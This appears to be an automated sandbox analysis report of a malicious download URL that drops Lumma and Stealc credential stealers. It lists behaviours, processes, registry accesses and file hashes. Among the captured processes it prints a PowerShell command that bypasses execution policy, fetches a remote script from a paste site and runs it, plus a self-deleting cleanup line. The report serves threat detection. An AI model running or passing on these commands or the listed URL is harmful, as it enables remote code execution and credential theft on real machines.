Malware Analysis Report

2025-08-06 02:51

Sample ID 241015-xxsrgasanh
Target http://relaxrealty.com/download.php
Tags
lumma stealc mainteam credential_access defense_evasion discovery execution spyware stealer
score
10/10

Analysis Overview

Threat Level: Known bad

The file http://relaxrealty.com/download.php was found to be: Known bad.

Malicious Activity Summary

lumma stealc mainteam credential_access defense_evasion discovery execution spyware stealer

Lumma Stealer, LummaC

Stealc

Blocklisted process makes network request

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

Unsecured Credentials: Credentials In Files

Indicator Removal: File Deletion

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Program Files directory

Subvert Trust Controls: Mark-of-the-Web Bypass

System Location Discovery: System Language Discovery

Checks processor information in registry

NTFS ADS

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-15 19:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-15 19:14

Reported

2024-10-15 19:20

Platform

win10v2004-20241007-en

Max time kernel

366s

Max time network

304s

Command Line

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://relaxrealty.com/download.php"

Signatures

Lumma Stealer, LummaC

stealer lumma

Stealc

stealer stealc

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Program Files\LDPW\1.exe N/A
N/A N/A C:\Program Files\LDPW\2.exe N/A
N/A N/A C:\Program Files\LDPW\3.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Indicator Removal: File Deletion

defense_evasion

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3552 set thread context of 4300 N/A C:\Program Files\LDPW\1.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2604 set thread context of 4680 N/A C:\Program Files\LDPW\2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2340 set thread context of 3356 N/A C:\Program Files\LDPW\3.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\LDPW\1.exe C:\Users\Admin\Downloads\Installation_x64.exe N/A
File created C:\Program Files\LDPW\2.exe C:\Users\Admin\Downloads\Installation_x64.exe N/A
File created C:\Program Files\LDPW\3.exe C:\Users\Admin\Downloads\Installation_x64.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File created C:\Users\Admin\Downloads\Installation_x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\LDPW\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\whoami.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\LDPW\2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\LDPW\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\Installation_x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://relaxrealty.com/download.php"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://relaxrealty.com/download.php

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fbb3ee1-ac94-4752-a103-9a98674122d9} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 2320 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce8d57d-8d2d-45e0-b70c-a7f6a8cb6711} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2996 -childID 1 -isForBrowser -prefsHandle 2988 -prefMapHandle 2984 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27491e52-7cd0-4334-9324-bfcef4ec62d6} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -childID 2 -isForBrowser -prefsHandle 3904 -prefMapHandle 3900 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e03fc959-d716-43fe-bd97-c859f65141a4} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4720 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4712 -prefMapHandle 4704 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e6d5370-193e-442d-947e-a538efabc24f} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5432 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a15102dc-2d22-4e45-83f8-05cdcd42f329} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5416 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1d08f2a-697c-4a98-b75b-b14f6742e415} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 5 -isForBrowser -prefsHandle 5856 -prefMapHandle 5852 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8ecb176-663f-45c7-b5ef-6b9d8e5142d0} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\Installation_x64.exe

"C:\Users\Admin\Downloads\Installation_x64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe"

C:\Program Files\LDPW\1.exe

"C:\Program Files\LDPW\1.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\LDPW\2.exe

"C:\Program Files\LDPW\2.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\LDPW\3.exe

"C:\Program Files\LDPW\3.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\whoami.exe

"C:\Windows\system32\whoami.exe" /groups /fo csv

Network


Files

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\4defcc7e-0668-41d8-9807-bce8a6e82aeb

MD5 d0a9271e19ba4d0f6c6ef3fc6b2f0e37
SHA1 7b6a7d09d81b9d3ddbf2a883f648233682bfd345
SHA256 38f3164bb28da1de874c2bcd3dad44a859db856eed99b3e767b19f840a0b99f2
SHA512 03d0281f264cbecd0042b572e7be418d7dcf875d738eb850e60ceaee96918f44b18e3004ee4584e9abb22ee33ecbad940b294b0e3943ecd409ac51c63526249b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\6a259bb3-a633-4bfd-99e2-0e61fbaada98

MD5 88501986f113103884c371a1b68730b9
SHA1 44c17f70d398c58aa9a28254e2a2f5df923bce6b
SHA256 bfab2f3893fc3d0882d85dd329cd102c9d6dbf37ce365617505d96c4c7a58b94
SHA512 35a439add4b636b73cbc23fb236e93ac737e8814564ca2d21b47c267509604e7bdb7b9ab4f582cbb597a2b9744029a465c2cd83385648093239e9f877d254ee2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\172c7592-abeb-4f01-b0d0-bb1d89543020

MD5 10e81d82125136a41428489764c37d41
SHA1 152427e864464ea9ca9a70c14b2e47d2ac1e62df
SHA256 2b2865ee617cf7d3eea43894ec9052e35ee262a954a8e307103d8687e3b02edd
SHA512 83f24d180d7f219aa5c420b40abd1cce3e6e3174867cc059e4635c96b537cea7ed73095bc7639b89ccb491a357b717a1ec88a409eaa038f7d70b592cf5482c28

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

MD5 fa86d3127b05fa5b4cfa5c1620244020
SHA1 326bcaeedb610b86cffdcbae2d4d7990b922d621
SHA256 a1802991b20be3028cf54b14b4bcf0bb66e4b2e6801c27a154c385bd9364b237
SHA512 2f84a4f9e97faed3a03ec91d39b91a301fbcd4da830bbb175d52c3f6ce4cc1d0ef8fc2da99eba662e1609b5950e35dc104a14123aecdccec47dbcb97c5797e99

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json

MD5 6803de8259cf8a7dd911ab86170e8978
SHA1 6918ee30f59e745b57cff995c8b88cb68426efc6
SHA256 e10592ce35a232ce83a29995687b782dc4df6147daf676f5d4db136dc7c9690e
SHA512 407d9bfe6d5b64ca1227062cd3519176b7cb175279e2a8b10a1a22c4597864bc1ef52c2611a7bbf8b97d2491c02bd82a416f816cbcb9252f4ceeaa3a781891f6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

MD5 642da0358f4719ee4b4790c05d4a7cc5
SHA1 a2dac4cab10b74eae44107f6c519993b9dc780b9
SHA256 61241dc71f65638429da6afaf9fbb15d530aaa860bf9bd4f1b7492c465cbe074
SHA512 adb5994094e459b427e0896dfb42e755ff609404d1642052f5d489858cd1fdbb574bd78897feb97af58ae7098cda8c55bc3fe30f120f7dae9abddeb3a7e39d2d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

MD5 666fcc5290d4be92abefa4cdaee078ee
SHA1 58c0c51a405a3d6ec7e3d09c56a72f5a5440bd5c
SHA256 71cc51c2157168ea4a5f41b7ce2b07bb0ba562288ab5093d85e4bf61ae0be7d0
SHA512 a6437382c960c2e6f306e08fb0454a3fdc17954d84e9fe346d8f25f993a10a8f0ea550fe47a34696d6f9b0a66e9c4a0a6d7300cd9d174912dd4cce6375c2293d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

MD5 13e5d7ceb89a4097ae35f82e0580cd88
SHA1 954b26c46496bfdd7126c259612f50326bd462f6
SHA256 2397e0bf9b68709d0cd4e119ce588c23727d358331ab78b665342a2a93477a5f
SHA512 e88acd7a359fd1e2ba4d203cc817c1304859039b774d06632ae1cc4696a7b3119f7587decd9b56f972c778ee8c4696802f54aaf8790d67a54057517b3d676e95

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

MD5 574c4ed762e00d262e2578cdd179f284
SHA1 c1acdc51ed8210ffdf4d6b468bc074abb58ecfee
SHA256 f531588be12be03484d3dcd22c8dfc2f02a4f74cd8da810664ba6daac16371cf
SHA512 c559d3796d1e71caf28b58438087b9392514bdda59532afe9167aadaebad1fac8be908882b84afa2a245c0d3513fefd2681d9c1a9443b90aa2fbfbc1fbf4ec95

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\cache2\entries\0305BF7FE660AF5F32B4319E4C7EF7A7B70257A3

MD5 d169a409dd9a04692f89a73556eb1a6c
SHA1 26eb3390ec7c150bb8cfdc97dc48dd4e32f8178c
SHA256 808f2f6a632666e1d7ca6f07ee4788ab452966f63a81edf56e7bf37abe32b95a
SHA512 67affd6c921174649c757b5f2f84a959fd3097e98c8e10b6191c40c874af8b285505c228c91abf6cdb97a2b81fdb001c6766712bdf9d5704300f894e36279f18

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

MD5 f0299633956e78949e0971a5336d9da6
SHA1 71c0a2f22190c4cfbdd20f42da1e7d71f31c61ec
SHA256 3a3ba1ad0da9cd232cd0900a98bc6e0851984f2261615386b224502be8f6822e
SHA512 3314698ad1eaa0ec4bc32e59f6bad0e4c35710096e5fce625cd0e8eaf54ad53c191ea02161374a78035e0f5fca164980e9e6506dd340346a1368f680968dd109

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\AlternateServices.bin

MD5 9ddd2a01046cbab7f7b6a6a4f388a756
SHA1 5e35d6175d99329b2b5a140f2a74ce13e6e92da4
SHA256 38c38fa3d47172a2e88f02c2a49c80b9f559132d1cc7a95f6ed24cbd28e856b4
SHA512 ed62b9279c6467f1b5543b7e018ab24b931ba6afc638674616f877cba3c411eb55c75f54a8d95d7933f2fe8b0ef9389fa5efaddb965a48daf572f2f931db5abe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 7ed81394f2a2b737d7d177827dc52937
SHA1 1b19ade845aa51735c2e475de8311a519f84ba30
SHA256 f6aa29a70144f6eae0116914f8add4fff06c097ce8445fc29fbc441c7066897d
SHA512 03268eccef510ff74ca051d91d7d918e0ec6848530f689e6f3c368ca3deb662ebc9baed22848a5c3f83e6a9561aca9151272343982bd4ec6a3b0435b64eeadd3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

MD5 5b55c7f704ae21d743c3e4ac4fc5fa68
SHA1 ae6b1d83c5814cf742140a68363359eb58186d57
SHA256 9d79ad3ff37b6c081d369ca2756e778b36104d7f4258ad6f99940b94ee584611
SHA512 0c730a9311f6c2fec45ca28479800ac264f8fb6a8d7c0f1a8ade2ceca788d2e9064b73f130faee963d445f044fce71c0f795e3e7d8fb649b6f13242a8ebba2de

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\hostfxr.dll

MD5 307b6f5832c5b80c8bc87d97b67e4775
SHA1 9ab2916ae987ebf0131bab10e449933f3fadcfc0
SHA256 7652aeb0ecb06119b0871f6b850193d3ffae73e22bf207c81b67b155afa85991
SHA512 cec6e1b2c278b287fc05767a7c596b8f1d180d24ca5be0d4ed484ca8e82487bcc804245e6c60e45852ba7964a3b288f42504c792a617f5200b461089d7a9219b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\hostpolicy.dll

MD5 314f06e61af6221c9b4b0af77e1af522
SHA1 73b811d6488ab3dbb7edf9cf7d3daa0ce2343585
SHA256 ee653d530f0ba5bf0e7f691825dcbd2dc6995374820d7e4aef0604cc47c3b3ab
SHA512 b05785222438da0f1b0a30ed77d3977c8a96fda00cfe8475816cbcc9b05176253d8a150d713ca99f58145d36ecce7ab643cfc15def39e1169a122dcc2cbd863b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\coreclr.dll

MD5 a2820e527c4b99c4c649df4e54d4f38d
SHA1 a2bca67626d532a3b1a96c5d913958470faa4727
SHA256 100a032cbeb299c8d7cfe02fb39ca59c8d17fbbe276ed1da577c0eb6444b1a51
SHA512 a0942fbe93394d0978cf5f9747fdff4db90faa88b264dc56ae79d50fc0fc17b2701a211a46fff86d579465273156fb278f49a89e5abd6c63fa7acccdd03a6627

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.CoreLib.dll

MD5 3bef1d84ef1785381eff399adec681df
SHA1 6a933f1c9f8f5cecb0ffa9aa0d6b382854ed99ae
SHA256 43ccf83cf6dd08e2ba9159990a0b099493667c423de51b1db1191f05a748fe51
SHA512 9f436e7eb201927663b93e691d781b44d2d34011215a2b4dbf7584e5d788528f7601a7e9e4bbf422734ab9792984a44eed2bf5d9298940eb37420bfdef2066c2

memory/1776-3133-0x00007FF8A8D76000-0x00007FF8A8D77000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Installation_x64.dll

MD5 963e14be9b45b9f44763de5caa628503
SHA1 1bed67492024523e3974bf1bac98323ecd982986
SHA256 9053c83a9b1e0b3da1c7d9620490d855124d2878e72cb54648dde00ef6377105
SHA512 89815cc3f7c32e85b1cf513ef0863fefe0a1151b4d135616aa1a773f87aeb633b489f0fe150ee39750dd64ab8be800a2b8a1c5b0bfcae29d7e7ce14083ae44f0

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\clrjit.dll

MD5 8e636859f42c166c13eb041311299b8a
SHA1 d5b0d5104c5cfe1b7b2c95d7680c2e84d4f0d70b
SHA256 d713a5bafa2ef2fa7c1594d9c22d03357f62f8cb359208bf9e3616639dc351f9
SHA512 a5fbee9f04f5ef53c6ab2c666cb1f9e620ceacb25fc2eeb8a079887e2f3f3a3bbee88c6036d39125138f93c599986697444707db90e5ac30515e59d54246e094

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Xaml.dll

MD5 b8669a3dbb9ba437449cecd2cf16282f
SHA1 abca27d391ceb6b86ebc730196688258d17618b8
SHA256 7bd25ecc597ab4724f1275d9e4ed74b72d8b0811e062946bf2f338af5d890c8c
SHA512 34fd7a604aa31383bc0639aad79c039cefea03de224cfe957f43e2d2140ef0bf1cc25fc9034a56c8bb1a46d8e1221e8af50353bc36cb88171fcda229632a42d6

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.dll

MD5 6874d29dc20943dd13b3898cd54cdd88
SHA1 3eb8c35b2792f5433f45bb4f04e63fa16e7d9782
SHA256 20a1ecc100a50c567c170063b18e1fdb0f9d41ea5878981bd3c38f95544ca529
SHA512 c800164aef2b1bfbd01f16360184bd416536ee4e182f39317f89702465d11616ce320575e6e442552142957f027a3012126eed54c32ed39d585a357fa26f01b0

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.Uri.dll

MD5 8a730b383910a79ea2b9d1c06b11a7ae
SHA1 e9905d342be85151eb94f42da135aec525cc2494
SHA256 a1659efc1d703b3ead12b4e2132d3e2d7443c921e2833a554961173510ffd211
SHA512 7182a50910cc21698c1edc53c8f13fa9cd526c231e951d6f05df68daa864ddfbd4a365609c35f7d1d1bc1da7d08ee1c251f6a96e30b1e33644a0b32e95b57d52

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Linq.dll

MD5 27fea566be23b3fc10d7d8274184bbed
SHA1 6e01bcca3ef6bb6a9673f1aecd60881e42856003
SHA256 990e7ce0c3aa912e4cec7cdd6d9602c202daba2759058ed61e5f1a002035ae3a
SHA512 c099b03bf4ea3614ab4b65d1e853ef5507ee134b534e350bcaa570ba31a92623c9c6fa8dcf80e671937c7acc20f9aae127df2ce1caf415a514a9b01ba8448904

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.Thread.dll

MD5 e28b58d37ecfc7eceaf280ed742343f5
SHA1 bb9a306bd8be1579f81edb80ad0114d28d2bd114
SHA256 de01a740531b6411d8b01a38a416b6388d755954a7d29d6b50ca71f0ae4c96bc
SHA512 83dbaf4e873e8174ae9716ca1b8300636761902da5c0232d3b4de31e51c95494e23a67859576804412c345b01813cdfa60ce034d9c8f89374c1e0c7ac4a55aa6

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationNative_cor3.dll

MD5 93b917c939ec3ddfdb75359a1c38961d
SHA1 62352b83989ca301629d20f0a519b6cdde3569a5
SHA256 ed4eefa93debb2967807bf866aa5eb0b80d953d1e6a0ac43a337e36e1e4beb5e
